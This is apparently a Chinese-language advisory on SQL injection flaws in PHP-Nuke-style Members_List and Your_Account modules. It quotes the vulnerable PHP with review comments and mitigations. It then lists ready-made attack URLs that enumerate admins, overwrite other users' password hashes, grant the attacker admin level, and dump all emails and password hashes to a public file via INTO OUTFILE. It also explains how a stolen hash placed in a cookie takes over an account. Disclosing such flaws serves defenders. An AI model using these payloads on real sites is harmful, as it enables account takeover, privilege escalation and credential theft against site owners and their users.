Members_List、Your_Account模块中存在SQL注入缺陷。如果magic_quotes_gpc选项为“OFF”，攻击者可使用下列攻击方法及代码利用该缺陷:
PHP代码/位置:
?/modules/Members_List/index.php : ------------------------------------------------------------------------ [...]
// Builds the member-listing query from request-controlled values.
// $letter selects the name filter, $sortby the ORDER BY column, $min/$max the LIMIT window.
// NOTE(review): none of $letter, $sortby, $min, $max is validated or escaped before being
// concatenated into SQL; with magic_quotes_gpc off they reach the database verbatim.
// Mitigation: whitelist $sortby against the displayed column names, cast $min/$max to int,
// and escape $letter (or restrict it to a single letter / "Other" / "All").
// NOTE(review): literals such as Anonymous appear unquoted here; this may be the page's
// rendering dropping single quotes rather than the shipped code — verify against the original file.
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";
$where = "where uname != Anonymous ";
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
    // Prefix match on the user name; $letter is interpolated directly into the LIKE pattern.
    $where .= "AND uname like ".$letter."% ";
} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
    // The second test is redundant: $letter == "Other" already implies $letter != "All".
    $where .= "AND uname REGEXP \"^\[1-9]\" ";
} else {
    // "All": no extra filter (this branch is a no-op).
    $where .= "";
}
// $sortby is used as a raw column name, so ordering by a column that is never displayed
// (e.g. pass) is accepted; this is an information-leak vector even without a syntax break.
$sort = "order by $sortby";
$limit = " ASC LIMIT ".$min.", ".$max;
$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);
// or die() with no message: a failed query aborts the page silently.
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();
echo "<br>"; if ( $letter != "front" ) { echo "<table width=\"100%\" border=\"0\" cellspacing=\"1\"><tr>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n"; echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font color=\"$textcolor2\"><b>"._URL."</b></font></td>\n"; $cols = 4; [...] ------------------------------------------------------------------------
/modules/Your_Account/index.php : switch($op) { [...] case "mailpasswd": mail_password($uname, $code); break;
case "userinfo": userinfo($uname, $bypass, $hid, $url); break;
case "login": login($uname, $pass); break; [...] case "saveuser": saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter); break; [...] case "savehome": savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson); break;
case "savetheme": savetheme($uid, $theme); break; [...] case "savecomm": savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax); break; [...] } ------------------------------------------------------------------------
/modules/Your_Account/index.php : [...]
// Persists a user's profile edits (and optionally a new password) to the users table.
// Authorisation: the cookie's user name ($Cookie[1]) is looked up and the stored password
// hash must equal the cookie's second field ($Cookie[2]); the request's $uid must match the
// looked-up uid. Nothing else about the submitted values is checked.
// NOTE(review): every field (realname, email, femail, url, bio, avatar, icq, ... newsletter)
// is interpolated straight into the UPDATE statements below; so is $check, which comes from
// the cookie. A value ending in a SQL fragment can extend the SET list or replace the WHERE
// clause. Mitigation: escape or parameterise each value and cast $uid to int.
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
    // $minpass is read below but is not in this global list, so the length check compares
    // against an undefined value.
    global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;
    Cookiedecode($user);
    $check = $Cookie[1];
    $check2 = $Cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        // Prepend a scheme if the URL lacks one. (The `";` after the pattern looks like a
        // rendering artefact of this page, not the shipped source.)
        if (!eregi("http://";, $url)) {
            $url = "http://$url";
        }
        if ((isset($pass)) && ("$pass" != "$vpass")) {
            echo "<center>"._PASSDIFFERENT."</center>";
        } elseif (($pass != "") && (strlen($pass) < $minpass)) {
            echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b> "._CHARLONG."</center>";
        } else {
            // Bio is the only field that passes through the site's text filter / FixQuotes.
            if ($bio) {
                filter_text($bio);
                $bio = $EditedMessage;
                $bio = FixQuotes($bio);
            }
            if ($pass != "") {
                // Second Cookiedecode call is redundant; $user was already decoded above.
                Cookiedecode($user);
                sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
                // Password is stored as an unsalted md5 hash.
                $pass = md5($pass);
                sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);
                // Re-read the row by name + new hash so the cookie can be reissued.
                $result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi);
                if(sql_num_rows($result, $dbi)==1) {
                    $userinfo = sql_fetch_array($result, $dbi);
                    // Bare-word array keys (uid, uname, ...) rely on undefined-constant fallback.
                    doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum], $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]);
                } else {
                    echo "<center>"._SOMETHINGWRONG."</center><br>";
                }
                sql_query("UNLOCK TABLES", $dbi);
            } else {
                // No password change: same UPDATE minus the pass column, no table lock.
                sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);
                // $a is assigned but never used in this function.
                if ($attach) {
                    $a = 1;
                } else {
                    $a = 0;
                }
            }
            Header("Location: modules.php?name=$module_name");
        }
    }
}
[...]
// Saves the user's home-page preferences (story count, custom block, broadcast, popmeson).
// Same cookie-based authorisation as saveuser.
// NOTE(review): $storynum, $broadcast, $popmeson and $uid are interpolated unescaped; only
// $ublock goes through FixQuotes and $ublockon is normalised to 0/1. Mitigation: cast the
// numeric fields to int and escape/parameterise the rest.
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {
    global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
    Cookiedecode($user);
    $check = $Cookie[1];
    $check2 = $Cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        // Checkbox semantics: any submitted value means "on".
        if(isset($ublockon)) $ublockon=1; else $ublockon=0;
        $ublock = FixQuotes($ublock);
        sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi);
        // Reload the row and reissue the cookie so the new settings take effect immediately.
        getusrinfo($user);
        doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode], $userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name");
    }
}
// Stores the user's selected theme. Same cookie-based authorisation as saveuser.
// NOTE(review): $theme is interpolated unescaped into the UPDATE and then echoed into the
// redirect URL. Because the SET list has a single column, a value carrying an extra
// ", column=value" assignment or a replacement WHERE clause is accepted verbatim.
// Mitigation: validate $theme against the installed theme directory names before use.
function savetheme($uid, $theme) {
    global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
    Cookiedecode($user);
    $check = $Cookie[1];
    $check2 = $Cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi);
        getusrinfo($user);
        doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum], $userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon], $userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name&theme=$theme");
    }
}
[...]
// Stores the user's comment-display preferences. Same cookie-based authorisation as saveuser.
// NOTE(review): $umode, $uorder, $thold, $commentmax and $uid are interpolated unescaped;
// only $noscore is normalised to 0/1. Mitigation: cast the numeric fields to int and
// restrict $umode to the known display modes.
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {
    global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
    Cookiedecode($user);
    $check = $Cookie[1];
    $check2 = $Cookie[2];
    $result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);
    list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
    if (($uid == $vuid) AND ($check2 == $ccpass)) {
        // Checkbox semantics: any submitted value means "on".
        if(isset($noscore)) $noscore=1; else $noscore=0;
        sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi);
        getusrinfo($user);
        doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass], $userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore], $userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
        Header("Location: modules.php?name=$module_name");
    }
}
[...] ------------------------------------------------------------------------
/modules/Your_Account/index.php : [...] function mail_password($uname, $code) { global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name; $result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi); if(!$result) { include("header.php"); OpenTable(); echo "<center>"._SORRYNOUSERINFO."</center>"; CloseTable(); include("footer.php"); [...] ------------------------------------------------------------------------
------------------------------------------------------------------------ [...] function userinfo($uname, $bypass=0, $hid=0, $url=0) { global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name; $result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi); $userinfo = sql_fetch_array($result, $dbi); [...] ------------------------------------------------------------------------
------------------------------------------------------------------------ [...] function login($uname, $pass) { global $setinfo, $user_prefix, $dbi, $module_name; $result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi); $setinfo = sql_fetch_array($result, $dbi); [...] } [...] ------------------------------------------------------------------------ |
Members_List模块:
- 显示用户:
http://[target]/modules.php?name=Members_List&letter=All&sortby=pass
- 显示用户:
http://[target]/modules.php?name=Members_List&letter=All&sortby=uid
- 显示moderators :
http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*
- 显示管理员:
http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*
- 显示所有以“abc”开头的用户 :
http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*
Your_Account模块 :
- 将“Admin”用户更名为“Hophophop” :
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]
- 将“Bob”的密码（数据库中存储的md5值）改为“d41d8cd98f00b204e9800998ecf8427e”:
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&email=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,
pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
- 将普通用户提升至管理员权限:
http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]
或:
http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]
- 将所有用户的电子邮件和加密后的密码保存到http://[target]/AllMailPass.txt中 :
http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)
%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*
通过在Cookie中发送加密后的密码即可访问相应用户帐户。
- 将用户的所有信息保存到http://[target]/admin.txt中:
http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%user_level>
1%20INTO%20OUTFILE%20/[path/to/site]/admin.txt
[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。